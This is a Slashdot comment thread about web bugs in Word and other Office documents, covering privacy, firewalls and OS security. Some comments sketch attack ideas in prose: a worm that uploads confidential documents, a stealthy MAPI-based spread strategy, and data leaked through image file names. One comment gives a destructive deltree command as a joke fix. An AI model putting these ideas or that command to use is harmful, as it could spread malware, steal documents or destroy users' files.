finger? To a box which is probably an MS-Windows (tm) PC? I'd like to see that. A far better bet would be if you somehow sniffed out their network beforehand, and have the info that you gathered ready in a text file or a DB of your own.

However, would a company that is so insecure as to allow such intrusive sniffing from outside security concious enough to adequately value your superior security skills?

Re:Actually that'd kick ass

[quietlysubversive]

You put your real name in Word?

weird...

Way to disable this?

[antdude]

Is there an option to disable this feature? I am unhappy with this.

List of software security problems?

[harmonica]

With all these reports, is there a list that says

• what a given version of a given software package does without the user confirming it (e.g. transferring GUID's like it is the case in some versions of the Windows Media Player)?
• what is stored in documents what you wouldn't want to be there (e.g. Word DOC files and its fast-save feature that has multiple versions of the same document stored)?
• what is auto-executed after have been transferred to one's computer (e.g. Outlook macro features)?

One could then simply compare the list of installed software at home or work, best with hints on how exactly to turn things off or what replacement version to install. Previewing my comment I see that I only gave MS software examples, I'm aware that they're not the only ones screwing things up ;-)

Ironic

[Kriticism]

Back Orifice indeed....

-Kriticism

Yet Another Feature

[ackthpt]

I haven't looked for this [moderating of cookies], but typically junk like this comes enabled and the user has to:

Find out about the feature

Query Help for about an hour to find out how to moderate

Find it shipped enabled and then disable it

Probably my greatest annoyance with M$ products is this type of behavior. It usually costs me hours to find and disable all the annoying "features", particularly because M$ doesn't use the same terminology the rest of the world does, so it's non-obvious. Then the on/off button is deeply buried in a non-obvious location. There's a name for people who design things like this: a$$hole.

Vote Naked 2000

Will this also work ...

[gotan]

... if the internet happens to be accessed via another application, namely Internet Explorer, which you expect to access the internet and thus are likely not to block?

Because that is (according to the article and MS's statement) what actually happens.

It's not happening. So what?

[barzok]

Regarding the potential use of Web bugs to track Word documents, Microsoft said that there is no evidence that such activities are occurring

Just because it isn't happening yet (and I stress "yet" because now that the cat's out of the bag, someone will be working on exploiting this), it shouldn't be considered a problem? Well, I guess I'll stop worrying about my blood pressure, since I haven't had a heart attack yet.

So don't use Netscape

[Greyfox]

Or don't read your mail in Netscape. I've recently discovered VM for Xemacs, which gives me all the features I need -- POP, IMAP or direct mail, you can change your address (Handy for non-static POP accounts and my biggest complaint with PINE,) flexible address book handling, real PGP/GPG support (With a menu drop-down added in, even!) MIME handling, folders, and so forth. Plus some stuff I never had before like xfaces, which is pretty damn spiffy.

Er, wrt PostScript and TeX/LaTeX

[Greyfox]

You DO realize that PostScript is a computer language don't you? If you're viewing it with safe turned on, it's slightly better, but it's still a computer language and offeres all the chances to do nasty evil things with it.

When I was playing with PostScript, I always wanted to come up with a PostScript worm that would propigate from printer to printer and once there, scan for the word "strategic" and replace it with the word "satanic." If I'd been able to figure out how to open a network socket in the language, I could have pulled it off too...

TeX/LaTeX are also computer languages, allowing at least for conditionals and possibly looping as well (I never got THAT much into them.) They read kind of like LISP without the parentheses.

While I'm not aware of any actual instances, the potential for mayhem is there.

Re:No way! That is amazing!

[piku]

Oh thats lovely. I get flamed because I expose the idiocracy of a fanboy. Figures, THIS IS Slashdot for heavens sake...

Not a real bug

[Fervent]

How is this a problem? Corporations for years have been tracking users opening certain files, and with the built-in features of macros and internet access in most office suites (StarOffice and WordPerfect included) isn't this the same thing?

MS just took the next logical step. They built a feature into the application that programmers had been scripting into it for years.

Maybe I will get that Old Navy gift certificate

[Mr+Krinkle]

Trip to disney world whatever I have a feeling the little creatures of the night that write all the stupid Microsoft will track this message are going to have a hayday with this thing. See we have always told you that we can track you and now if you forward this to 10k people you will get an Old Navy gift certificate. oh well me

Somebody moderate this parent up!

[Autonomous+Crowhard]

This is pretty big.

What's to stop someone from having their macro encode a little personal information into the URL? Just have a CGI script on the other end accepting the parameters and wait for the contact info, or what have you, to come flowing in.

If you think people would be on the guard for something like this just think about all the cases where HR departments and job search facilities ask for Word versions of a resume.

I happen like the less bloated (older) versions of Word, but at this point I think the only safe thing to do is: Just say "no" to Word.

We need more fine-grained access control

[Eccles]

Once again we have an example which I think points our need for more fine-grained access control. We need to be able to limit what apps other applications may run/interface with, and we may also want to a way to have inherited limits. I don't want most programs being able to send mail, I want them locked out unless I give them permission. I'm not sure of the technical details of implementing this, but if we want truly safe computers, this seems like the only way to me.

yeah, there's one sure way

[auto85842]

there's one sure way to disable this "feature:"

C:\> deltree c:\progra~1\intern~1 /y

Re:yeah, there's one sure way

[JonK]

Amusingly enough, that won't work (hint: read A Moron's Guide To COM: this may help explain how the Program Files\Plus!\Microsoft Internet directory has approximately 2/3 MB of code in it)
--
Cheers

Ok lets try this again

[piku]

Last time I got flamed, so lets try again. How do you expect Word to access images that YOU linked to the web without accessing the Internet? Does Linux allow you to surf the web without being connected to the internet?

At least it doesn't to THIS: http://linuxtoday.com/news_story.php3?ltsn=2000-08 -30-022-04-SC

Re:Ok lets try this again

[rellort]

Yes. But only the web on localhost.

Re:I have just one thing to say....

[kermit+the+fraud]

Use Notepad! Or use the DOS command prompt and do a "print screen".

Trojan!

[www.sorehands.com]

Adding these types of things would be essentially trojan programs. Same thing as ad-trackers using cookies I would like to see some of these companies that use this type of things as basis of a charge under the computer tresspass act.

Re:WHY DON'T YOU EVER ANNOUNCE STORIES LIKE *THIS*

[zCyl]

Because anyone who wants to stay up-to-date on security problems with any Linux application can simply stay on the appropriate mailing list and find out when an update patch is available. Microsoft is a different phenomenon, and thus requires different media coverage. Also, the X-Chat vulnerability announcement comes with a fix, the Microsoft Word one is a continuing, acknowledged problem that will likely not be fixed, thus it becomes newsworthy.

Re:This isn't much different than Web Pages alread

[mcelrath]

Her first reply was, "HOW CAN I MAKE IT NOT DO THAT?!?"

FilterProxy can successfully remove web bugs.

This message has been brought to you by Blatent Plug-O-Matic(tm)

--Bob

Re: A disaster if Word is emasculated

[Opinion+Dalek]

The ability of Word to be fully automated is one of its better features, and one that I have used many times to provide clients with applications that do a straightforward tasks.

If the proposal is to disable something you can do in a browser, but not in a word processor, then you are going to end up with inconsistencies when using ActiveX/OLE etc. to do things.

Whatever setting the user has in IE should be the setting in Word. Improve the IE options, rather than castrating word. Inconsistency between Office apps is bad enough at times (see Microsoft Office Annoyances) without adding to it.

SBS e-banking passwords

[EyesOfNostradamus]

This weeks' Computerbild has a story about a new virus sniffing SBS (a Swiss bank) e-banking usernames and passwords using a similar technique. This is scary stuff, as real money is involved. Wanna bet that this e-banking service was marketed as "100% secure, because Bill Gates himself said so"?

Re:SBS e-banking passwords

[fReNeTiK]

How old is "this week's" Computerbild for you? SBS merged with UBS a looong time ago...

Just curious.

Or was it a typo?

Likewise HTML news posts

[AJWM]

Ditto for reading newsgroups with an HTML-enabled newsreader.

Something to keep in mind when browsing the alt.binaries.pictures newsgroups...

Why Word Documents Aren't a Big Deal.

[xonix7]

What you have to realize is that while Word documents might be a big deal today, in the fast paced world of computing, they really won't be significant in the future. A new medium - a method - of transferring and communication between hosts, indeed - systems, business, communications and other systems - is emerging. XML.

But is this really a computing only phenomenon? No, of course not. It maps directly to the rest of existence. The green Earth will still be here - those moutains, the green grass, the blue sky - even the black coal of the coal mines. That is your kingdom. When Microsoft is long forgotten, still the world will revolve as it has for billions of years. And in the death of Microsoft, perhaps a new star will be born. Perhaps a tree. Everything that exists lends itself to continued existence of some other thing.

So it is with the world and indeed with Microsoft Word binary-format documents. Word format will eventually die, but perhaps something will arise, a good thing, and while it will contain some of the essence of Microsoft Word binary format documents, nature will forgive its misuse while its molecules were part of Microsoft's Word binary documents. Indeed, the very harddrives of the people using Word will be the vehicle for transformations like this, all over the world - and in the end, the world will continue as it has, for billions of years.

Re:Why Word Documents Aren't a Big Deal.

[deusx]

What you have to realize is that while Word documents might be a big deal today, in the fast paced world of computing, they really won't be significant in the future. A new medium - a method - of transferring and communication between hosts, indeed - systems, business, communications and other systems - is emerging. XML.

I really hope we live in such a utopia someday.

But, how long has there been a Microsoft Word? How much human information, knowledge, and communication is bound up in Microsoft Word documents, and how long will much of that legacy be relevant?

And, considering how long there has been one, and the size and relevance of the legacy-- how long do you think we'll be dealing with binary formats like Word?

The future usually maps better to William Gibson and Ridley Scott: There's the new, but those old layers of decades dirty old grunge and tech still persist refusing to die. I predict that we'll still need to open MS Word documents in 2010. Hell, I just had to open a WP v4 document the other day..

ANOTHER RMS?

[jaxn]

Props to their CTO Richard M. Smith

It looks like we have another R.M.S.

snowcrash

[mattdm]

reminds me of YT's mom in her goverment job, making sure to take 18 minutes to read a given document...

--

I can see it now...

[EyesOfNostradamus]

... an Outlook+Word worm that uploads every document from the local C: drive, and from any shared network drives to a Web site. Or better: that posts them to Usenet (pointing a Worm to Web site is stoopid, as

1. the web site can be shut down too easily
2. it gives away your identity

). Or even better: only upload those documents that contain the words company confidential, for internal use only, trade secret or series of long numbers that look like bank account numbers. That way, you make better use of bandwidth.

Ouch, that would hurt. Better buy those MSFT puts right away...

Idunno about you (or that other guy)

[DebtAngel]

But since I use Opera, whenever IE wants to access the internet (usually, strangely enough, when I start it by mistake) I usually go NONONONONONONONONONONONONONO, and then press the No button.

I am, however, worried as hell when my connection lights are flashing like the dickens and the ZoneAlrm graph stands still. I complained to my ISP, and they say it's RIP (!). Good thing I'm not actually paying for service...

Comment removed

[account_deleted]

Comment removed based on user account deletion

Does this affect people using ISP's?

[skoda]

Earnest question here:

My understanding is that my IP address is dynamically assigned when I connect -- it's not the same from session to session.

So what is gained from a web bug other than the knowledge of which ISP I'm using?

It's not like my computer name (tacogato) would tell them anything. The ISP doesn't have my address, so a web bug can't get it either unless they can convert the IP to phone number and then reverse lookup to get my address. Is any of this possible? Or is this only a concern for those with static IP addresses?

What about small businesses, often using a shared modem setup? Do they generally have static IPs? If not, it seems the web bug is not broadyly useful.

Could someone enlighten me please?
-----
D. Fischer

Re:Does this affect people using ISP's?

[abde]

But the ISP does have logs of what IP address you were using at what time and date. With a subpoena (or maybe Carnivore?) that info could be extracted... I got spammed once by a real amateur who didn't fake his IP through Flash.net. I called up Flash.net's tech support and told them the IP, they gave me his username on the spot! I then wrote to the abuse email address and got his account revoked. It's that easy - and that's how powerful IP addresses are, even if you are at an ISP, for identification.

JOIN !LINK CLUB!

Re:Does this affect people using ISP's?

[skoda]

Thanks for the info; but I still don't see how a web bug is useful.

To get the ISP logs, presumably, you need a subpeona, which means it's a criminal issue. If they are backtracking from an emailed document, couldn't use the recipient's server info, to backtrack the email to your ISP, and then to you.

But if the web bug is a marketing tool, will the company be able to convert my dynamic IP to my email, username, etc. without those server logs? I guess it is helpful in that it would give general information about how a document is being spread geographically, and perhaps what companies are accessing it. But that's pretty vauge, and certainly not a personal privacy problem.

I don't want to imply I think this is a good thing, but I don't see how it's a big deal so far (at least until everyone has their own static IP).
-----
D. Fischer

Re:Does this affect people using ISP's?

[abde]

Oh, I agree with you that this isn't a big deal from a privacy perspective. But you asked if a dynamic IP could mask your personal identity, and the short answer is, it can't. So someone who really wanted to know, and had the (legal, technological?) means to find out, could find out who you are.

But you give out your IP every time you surf to any webpage anywhere, so this Word document *feature* is no worse a privacy concern than Apache weblogs, in my opinion. In fact, I would argue that this is a very useful feature. Most of the complaints seem to be knee-jerk anti-M$ sound and fury.

JOIN !LINK CLUB!

Re:Does this affect people using ISP's?

[Detritus]

To get the ISP logs, presumably, you need a subpeona, which means it's a criminal issue. If they are backtracking from an emailed document, couldn't use the recipient's server info, to backtrack the email to your ISP, and then to you.

A lawyer can get a subpoena for a civil case, which covers a lot of territory. Plus, the ISP can release information from their logs without having received a subpoena. A subpoena is just a way of forcing them to disclose the information.

Re:Does this affect people using ISP's?

[skoda]

Thanks for your response - I didn't mean to ask if a dynamic IP could completely mask my identity, since the ISP can always identify me at some level. I was more wondering about whether a web bug could identify me, which you addressed clearly.

I consider this to be like those annoying virus hoaxes I perpetually get: frustrating, bothersome, and "bad" on a fundamental level, but largely inconsequential. I'm more concerned about what the grocery store does with my shopper's card info. :/
-----
D. Fischer

Re:This isn't much different than Web Pages alread

[knarf]

StarOffice (version 5.2) is 'compatible' with this feature. I downloaded the document, and opened it in StarOffice 5.2, and was greeted by... my own hostname...

AbiWord 0.7 is not yet 'compatible'. I have not tried KWord yet.

Why not?

[uradu]

How about in a keyboard driver, like HP's latest? Any executable has the potential of networking, so people should slowly get used to this idea. One solution might be to have a kind of application firewall inside the OS, which lets you determine which apps should be allowed socket communications, and which not. And to be informed when an app tries to open a socket.

Uwe Wolfgang Radu

Re:Why not?

[baka_boy]

What, you meant implement some basic sort of sane security policies to prevent a single user's mistakes from fsck'ing the whole system? Or even design an OS with networking and multiuser access in mind? (Wow, that sure would be awfully tough...fifteen years ago, before it had been done almost every one of the flavors of UNIX.)

Or maybe you mean a more advanced architecture -- one that could apply different security models to code depending on whether it was being executed from a local or remote source, and which put potentially "suspect" applications into a limited sandbox? (Why, that sounds an awful lot like Java, circa the mid-90s...)

Basically, Microsoft, however good they are at UI design, code reuse, or marketing, often drops the ball when it comes to security. They push the envelope of functionality far before they're ready to deal with the vulnerabilities that it can cause. That wouldn't even bother me so much if they didn't try to pass their tools off as "secure by default," and keep problems and risks under wraps until they can be silently patched in the next service pack.

Re:Why not?

[uradu]

> Basically, Microsoft [...] often drops the ball when it comes to security.

True, true. Except when it comes to making file system security understandable to mere mortals. I'm still somewhat in the dark regarding file access privileges. The other week I couldn't share a folder on my drive out as read-only, no matter what I did other users couldn't see the contents of subfolders. Eventually it turned out that the subfolders of this folder had somehow received their own privileges and the parent folder's security settings weren't being inherited. I had to go through all the subfolders and files and reset the privileges on each one before it finally worked. Ok, somewhat off topic, but still regarding MS-and-security.

Uwe Wolfgang Radu

Re:Why not?

[Scott+Wood]

Or even design an OS with networking and multiuser access in mind? (Wow, that sure would be awfully tough...fifteen years ago, before it had been done almost every one of the flavors of UNIX.)"

Sorry, but UNIX (at least, most of them) can't do what was suggested, which was to completely deny networking, or impose limits on networking, to specific applications. UNIX security is primarily concerned with files, and if it's not a file, unless a special hack has been provided, you can't protect access to it. For true flexibility in these matters, you need to turn to a capability-based OS.

--

Re:Why not?

[gilroy]

Blockquoth the poster:

One solution might be to have a kind of application firewall inside the OS, which lets you determine which apps should be allowed socket communications

You mean, something like Zone Alarm?

Re:Why not?

[schoenk]

Unfortunately for you, everything in Unix is a file.

Re:Why not?

[Scott+Wood]

Oh? So where do I set file permissions on IP sockets? They behave like files in some ways, but not in others (in particular, they are not initially accessed via the filesystem namespace). And how exactly are things like semaphores, message queues, memory (other than raw physical or kernel memory), processes (/proc doesn't count), threads, signals, the scheduler, or higher level items such as user-interface widgets in any way represented by a file in UNIX or UNIX-like systems? They aren't. And even of those things which are files in UNIX, except for genuine files the protection mechanism is often far too coarse-grained to accomplish certain tasks. How, in UNIX, would I give a process the right to read raw data off a CD without giving it the right to make noise if an audio CD happens to be in the drive, or vice versa?

--

Re:Why not?

[HerrGlock]

You may want to read more about a UNIX filesystem. Networking and sockets are just more files in UNIX.

http://w3.arizona.edu/ccithelp/sddocs/unix-intro .html

4. UNIX Files and the File System: CONCEPTS

In UNIX, everything is a file, and a file is simply a sequence of bytes without any particular structure.

There are four basic kinds of files:

ordinary files
directories
special files (also called device files,
character files, or
block files)
links

Ordinary files may be ASCII or binary. Special files are the interfaces for peripherals and other real and pseudo devices. One can open, read, and write on device files and directories just as
with ordinary files, although the commands or system calls may be different for different file types.

Re:Why not?

[uradu]

Thanks for the link, I went and downloaded it. To be honest, I've never been too concerned about the security of my own machine, since I usually have nothing invaluable on there that I couldn't loose. Most virus and such utilities can be a real pest and can get in your way at the worst times. But something like ZoneAlarm, if it does what I was talking about, would indeed be quite useful. Incidentally, is there any reason to go with the Pro version rather than the free one?

Uwe Wolfgang Radu

Re:Why not?

[zeugma-amp]

I guess the obvious question is:
Is there a program for Linux that does what ZoneAlarm does?

Z

Re:Why not?

[jawtheshark]

I tried ZoneAlarm on my principal PC, but unfortunately it is also the NAT server for my network and ZoneAlarm doesn't support NAT :-(
Doesn't anyone know a similar program that monitors access to the internet (even logging would be fine, I'm not that paranoid) without having to disabling the NAT.
Besides, don't tell me I should set up a Linux box with a proxy and firewall, my mom already threathend to kill me because of all those UTP cables running trough the house.

Re:Why not?

[Phred+T.+Magnificent]

Zone Alarm seemed like a good idea to me, too, but I have one question: Would Zone Alarm see the requesting application as Word, or would it see Internet Explorer (which, most likely, the user has already set as "allowed" to connect to the Internet)?
Where is the wisdom we have lost in knowledge?

Re:Why not?

[Scott+Wood]

I'm plenty familiar with UNIX filesystems, Thank You Very Much. Yes, sockets have file descriptors and can be operated upon with many of the same system calls, but that doesn't mean a damned thing when it comes to security, since they don't exist in the filesystem namespace (other than UNIX domain sockets, of course, but that's not particularly relevant to this discussion).

So please, if sockets are "just more files in UNIX", tell me how I can set permissions such that a given process can not create one at all? I can do that with files. As for "everything is a file", see my prior post for a list of things which are NOT a file in any UNIX I've seen.

Oh, and exactly what UNIX-like system differentiates between text and binary files at the filesystem level?

--

Do not forget slow spread.

[EyesOfNostradamus]

One year? That is a helluva lot of time. Melissa and I love you were discovered within days, if not hours. Every single computer will have been cleaned before your virus activates...
unless...
you make yours much more discrete than Melissa and Iluvu. Do not mail yourself to every address book entry. No, just hook yourself into MAPI, and silently infect outgoing messages which the user sends. But only do it if the intended receiver has Outlook too (easy to find out by scanning the inbox and the archive for the last message by that user and looking at its headers). Even with this slow spread, one week should be enough to acquire a sizeable target market. One day before activation, go into "fast mode", and fire off automatic messages to all users who recently mailed us, and who have outlook. Subject would be Re: Subject of last received messages. Text would be entire quoted text of last received message. And then, let that puppy bark.

this is great! er, except for MP3 piracy...

[abde]

What's the big deal? How many Word documents does anyone write that they distribute? How many Word documents written by someone else do you read? Who cares if the original author knows you are reading the document? Why would you be reading a Word document from an untrusted source anyway?

what we should really be worried about is this part:

This issue is potentially critical for music file formats such as MP3 files where piracy concerns are high. For example, it is easy to imagine an extended MP3 file format that supports embedded HTML for showing song credits, cover artwork, lyrics, and so on. The embedded HTML with embedded Web bugs could also be used to track how many times a song is played and by which computer, identified by its IP address.

so there could eventually be Trojaned mp3 floating on Napster someday. Only way to avoid this would be to never upgrade Sonique, Winamp, or Media Player again...

JOIN !LINK CLUB!

Re:I have just one thing to say....

[shepd]

You do know that Star Office has a web browser built in, right?

In that case, what's to say the same thing can't be made to happen in Star Office?

Re:This isn't much different than Web Pages alread

[Alternity]

The problem at hand here is not being logged when we visit webpages. You could be logged just by opening an innocent looking Word document. BEsides with a webpage you can always look at the source and see there's a webbug...

Who knows, maybe you even read some Word documents infested with those webbugs already.

Re:Software that requres net access during install

[barracg8]

• The EFF or some such group should probably have a project to uncover and track such nasties.

Not easy without the source.

Now, what would be a good idea, would be to write a new, open source, OS, web browser, and office suite. If these were open source, it would be quite transparant when people tried to sneak this kind of crap into their products.

:-)
G

[OT] What about Outlook?

[fReNeTiK]

Is there any way of doing this with Outlook? I mean forcing it to display everything in plain text. That would make life a lot less painful when reading mail from coworkers who just discovered that damn stationery feature...

Yeah I know, format c: and replace with #fav_os. But sometimes you're not allowed to.

Oops, make that UBS

[EyesOfNostradamus]

More info here. That's dated August 17th, so given the usual lead times of dead-tree publications, it makes sense that it appeared in this week's edition.

Bitch, Whine, and Moan!!

[Hangtime]

Is that all that goes on here anymore. Let's all take potshots at MS anytime they do anything! I can think of a couple of good things about this.

Tracking internal document consumption - If you can place a cookie, you can track who and how many time something is read.

Changing document data to reflect different visitations. If a user has already read the document and it hasn't changed it doesnt download the Word document.

I am reminded of a Shakespeare when I hear this: (approximation) Nothing is neither good nor evil but thinking makes it so. Of course somebody can do something malicious, but somebody can also do something positive. If your that worried about it, download the document, open up your favorite text editor (insert here), open the Word document, strip out the header and footer information, and read it. Very simple. And for the joker who will point out what it if has pictures or some really brutal formatting that doesnt show up; well tell the folks that put it up on the website to save their document as HTML or a TXT file. Laters

/me gets off my soapbox
Hangtime

If you continue to think what you have always thought, you will continue to get what you have always got.
-Anonymous

Re:This isn't much different than Web Pages alread

[po_boy]

phil_reed asked:

Has anybody checked to see if the same thing happens in Excel?

I cannot stress this enough, people. Read the articles referenced by slashdot before you post obvious questions.

The article clearly states:

In addition to Word documents, Web bugs can also be used in Excel 2000 and PowerPoint 2000 documents.

So I would imagine that the answer is "yes. Someone has checked."

Software I **PAY FOR** at the store should work

Software I pay for ought not to require anything more from me. Everything I need had better be in that box so I can install it on my non-net connected laptop. Any additional needs better be printed on the outside of the package so I can pass it over at the store.

Re:Software I **PAY FOR** at the store should work

[pen]

Could you please tell us what CD-R software package this is so that we can learn from your experience and not buy it?

--

Re:Software that requres net access during install

[quantum+bit]

Ummmmmmmmm, yeah... And let's call these hypothetical Open Source projects Linux, BSD, Mozilla, etc...

Isn't StarOffice going GPL soon if not already?

:)

Fallacy of the Transparent Society

[SecurityGuy]

I've read that article three times now and still disagree. The premise, apparently, is that technology will destroy privacy in the form of increasingly undetectible surveilance, so we'd better get used to it and embrace it. Whether we do or not, it will be used against us.

I don't buy it. The premise that privacy and anonymity are a necessary casualty of technological advance is not necessarily true. It has been true thus far largely because privacy wasn't a design consideration in many of the systems we used. Most internet protocols were not designed to support privacy. HTTP is certainly in that category. The message is going out that privacy should be a design consideration. Zero Knowledge, for example, offers an service which reportedly encrypts your traffic and passes it through a series of servers to hide content and origin. Common cleartext protocols like telnet and ftp are being replaced by encrypted alternatives. Mr. Brin discusses privacy degrading technologies but doesn't concern himself with privacy preserving technologies which will grow in parallel.

Realize too that concern about loss of privacy is well founded. If and when privacy evaporates there will be consequences, and not just decreased crime, which isn't necessarily true either. How many convenience store robberies have you seen on the local news, committed right in front of the obvious cameras? Criminals aren't known for their intelligence. Recall the story of the gentleman who fell in the supermarket and was confronted with his purchase record, which included regular purchases of alcohol, and the threat that this record would be used in any lawsuit brought against the store. Just because you've done nothing wrong, but rather something "everyone" does now and again, doesn't mean that information (which, quite frankly, is none of their concern) won't be misrepresented and turned against you.

I've honored your request and read the article (again). Please do something useful as well: read Database Nation and understand the consequence of burning the privacy bridge. It's not an easy one to rebuild.

Nope, ZoneAlarm catches Word.

[DHartung]

As well as any other Office applications, when they launch an HTML type of document. It's pretty easy to grant permission this one time only, too -- so you always know if programs that normally shouldn't be net-enabled are trying to slip one past you.

Clearly you don't realize how either the "Internet Explorer component", or ZoneAlarm, works. Though Word uses the same HTML renderer, it is from within its own EXE. Granted, I don't kid myself that this will trap ALL instances of non-obvious internet use, but it goes a long way towards making me feel like I'm still in control.
----

advertising

[jafac]

How long before the .Net version of Word gives us banner ads on our documents that we can not remove without a hex-editor (which would probably invalidate the checksum embedded in the GUID which would probably make Word crash, and corrupt your dial-up account so you couldn't access the internet anymore).

Yeah, subscription fee: $100/month, or $50/month with banner ads.



if it ain't broke, then fix it 'till it is!

Re:I have just one thing to say....

[Zico]

Star Office

Good point. From the Document Web Bugs FAQ:

4. Are there any other programs that can use document Web bugs?

Yes. The Privacy Foundation has found examples of this image linking ability in Microsoft's Office Suite, such as in PowerPoint 2000 and Excel 2000. They have also been detected in Sun Microsystems' Star Office.

HTH, HAND.

Cheers,

WMA Music Format Has Bugs Too!

[pryan]

I noticed that the WMA format has bugs. When the song is finished playing, then some information in the WMA file is tripped and the player pops up a browser and goes to the URL specified in the WMA.

This is seriously bad and I no longer even consider using the WMA format, even though it compresses better. That, and there isn't support under Linux as far as I know. I'll be sticking with my MP3s, thank you very much.

The offending player is WinAmp with WMA support.

Without wishing to defend MS...

[sockeater]

This is utter bollocks.

"You can use a web server to see when a file on that server is accessed", not exactly groundbreaking insight.

The idea that this is a secret bugging feature introduced by MS is nonsense. What it is is the ability to link to content hosted elsewhere which, in a funny sort of way, is exactly what the internet is all about.

Anyone want to suggest the internet is just a great big spying conspiracy?

Obviously, MS are sneaky types and, as the class action story earlier today makes clear, there's an "I'm a victim of MS tyranny too!" culture growing up.

Compensation gravy-train, is the expression that springs to mind

Anyone who thinks that what's being reported here is even slightly sinister needs to take a few deep breaths (And possibly a holiday)

On the other hand, because of real problems, the sooner MS is controlled, the better for all of us.

Re:Without wishing to defend MS...

[norton_I]

I don't think this is a sinister MS plot to allow greedy lap-dog corporate friends of microsoft to use their orbital mind control lasers on me, but I do think this is one in a long string of fundamental archetectural designs by microsoft that while trying to adopt Sun's slogan "The network is the computer" ignore that there are rather seedy parts of that global computer. Internet users *need* process level sandboxing, strong authentication, fine grained access control, and that sort of thing. MS has decided, based on the highly skilled recommendations of their "moron estimator" that talking paperclips are more important. To be brutally honest to the UNIX crowd, they haven't done much better. Most commercial UNIXen install horibly insecurely by default--again part of the "who cares, it will be behind a firewall anyway" mentality. We have said "UNIX is secure because it has strong user-level access control", but single-user workstations need process level access control, to deal with the huge volume of untrusted code on the internet. There are some people working on better systems for free UNIX systems to perform those tasks, but they are a hell of a long way from prime-time.

Much work has gone into making server systems secure. Most UNIX systems, and even NT can be relatively easily set up as a moderately secure web server. FreeBSD's jail() is a nice touch for secure virtual servers, and more esoteric systems like HP's virtual vault can give you more peace of mind yet (I am not convinced it is more secure than a properly configured Linux/BSD machine, but many bosses won't listen to that). However, client side security is a joke at best, and a catastrophy more often.

Re:Software that requres net access during install

[korr]

Actually, it's really easy to uncover without the source...all the privacy group has to do is run a packet sniffer on their LAN on be on the lookout for packets coming out of the installation computer.

Even with consumer backlash, I imagine that this sort of check will become very common as net access becomes more of a requirement to run a computer. Companies believe that they are losing way too much money due to piracy, and this sort of scheme will make it virtually impossible for Joe user to 'borrow' the Office 2000 CD from a friend.

Re:This isn't much different than Web Pages alread

[quonsar]

FilterProxy can successfully remove web bugs.

So? She was wanting to know how to make apache stop writing logs. FilterProxy can't do that.

"I will gladly pay you today, sir, and eat up

Re:This isn't much different than Web Pages alread

[sjames]

A couple of years ago, people didn't expect to have Word Processors to check your spelling as you type.

True, let's boil it down to simple terms. "Except that people don't expect word processing documents to tattle on them when they read them".

Unless the spell checkers these days post you're most embarrasing mistakes on the net, the Word bug problem is worse by far!

Re:This isn't much different than Web Pages alread

[um...+Lucas]

Zone Alarm should stop it then... you have to explicity tell it what programs are allowed to access the internet. and from what i've found, it goes by teh program making the request, not the DLL, so two programs can use IE's dll's and only one will be able to get to the internet, if you're so inclined...

Re:This isn't much different than Web Pages alread

[jellicle]

I cannot stress this enough, people. Read the articles referenced by slashdot before you post obvious questions.

No kidding. I'm astonished by the number of questions posted in the comments that are answered two lines into the referenced URL. Look folks, the people who work behind the scenes at slashdot aren't trying to summarize the whole frigging article in a little blurb. We're trying to give you enough information to know whether you want to read it or not, or maybe a little info that isn't in the article. It is my unstated assumption that everyone who wants to post intelligent comments about a story will read it... but there are so many cases when this isn't true. Some of them are the slashdot trolls. But many aren't.

Here's an open question: what can we (we meaning the slashdot crew) do to get people to read the stories before posting?

--
Michael Sims-michael at slashdot.org

Tracking confidential documents?

[Rakarra]

This feature would only be useful in "tracking confidential documents" only if the person copying those confidential documents is most clueless. Ways I could easily get around those web bugs:

1. View the document on a computer unconnected to the network
2. strings confidential.doc
3. Firewalling connections to the outside

The list goes on? I like security through obscurity, but not when it's the only method of security, and certainly not when it gives a false sense of security.

Now.. if this was some type of encrypted document that could only be viewed in MS Word with a network connection available to the original site... I wouldn't be quite as skeptical.

A functional alternative...

[psicE]

602pro. Look around, it's like a suite/pc office/something, forget the exact name. Comes with a word-clone, excel-clone, mspaint-clone (???), and faxer (???). No Access here, but FileMaker is better anyway and most database stuff can be done with a spreadsheet or the Label feature. You're also missing Outlook, but use Eudora. Best part, it's free.

You can do this...

[Sawbones]

Well there isn't an option for that, but one way to help secure outlook is to set it to handle all HTML pages as files from the "restricted sites" security zone as opposed to the "internet" security zone - that way you can disable all sorts of scripting and activeX objects.

Just:
Tools->Options
Security Tab
Select "Restricted Sites" from the dropdown list.

Cheers,
- Sawbones

Re:You can do this...

[Trepalium]

That still doesn't stop HTML embeded images from "phoning home", and the default security settings for "Restricted Zone" doesn't disable scripting at all. ActiveX controls marked "safe for scripting" are still scriptable, as well as standalone JScript and VBScripts embeded into the HTML. The Java VM is still available, etc.

None of these "technologies" have any place in e-mail. HTML e-mail is nice for somethings, but not with this much potential for abuse. I can't think of one single legitimate reason why E-Mail needs to allow scripts to run, let alone ActiveX and Java applets.

The so called Restricted Zone should be restricted to the point where anything that's not HTML and not on the same "site" as where the page resides isn't allowed. And MS's e-mail programs should use it by default!

I know the answer to this

[dattaway]

What if someone were to embed the DeCSS code into a Word macro virus?

"I love you DeCSS!"

Re:Software that requres net access during install

[barracg8]

But how do you detect what is legitimate behaviour? E.g., a Word document macro may request images be downloaded via http to be displayed in the document. There may be valid reason for this: the .doc file will download faster, allowing you to start reading the text while the images are still loading.

But what if the macro encodes some data that it wishes to pass back to the server in the names of the image files it requests? E.g. instead of requesting grits.jpeg it requests grits_87.jpeg, passing a byte of data back to the server.

Packet sniff all you like - at an IP level you will see packets flying back and forth, at a TCP level you will see a a port 80 connection, at a http level you will see a valid and justified GET command (how do you know that grits_87.jpeg is not the real name of the file?).

The only way that you could determine that the macro was evil was by looking at the source. Now, I have never looked at Word macro coding (I do my best to avoid looking at Word), but presumably like any scripting language you have the source there, you can check out what it is doing.

But this thread is broarder than Word macros, check the subject - 'net access during install'. How can you truely determine what any piece of software is doing with the socket comunications it makes without checking the source?

Packet sniffers are not enough - they tell you what is going on, but not why.

cheers,
G

Re:This isn't much different than Web Pages alread

[crucini]

Here's an open question: what can we (we meaning the slashdot crew) do to get people to read the stories before posting?

The posting form could require some information from the article. It could be multiple choice, i.e. "According to the cited URL, the exploit affects:"

1. Only Word
2. Word and Excel
3. Word, Excel and Powerpoint
4. Word and Powerpoint
5. 1. Three questions would give a 1/64 chance of guessing correctly. If the questions are answered incorrectly, /. could redirect to the cited URL. All of this could be scripted around by a determined adversary, but I don't think the obvious-askers are determined adversaries.

Pot, Kettle, Black

[__aapbgd5977]

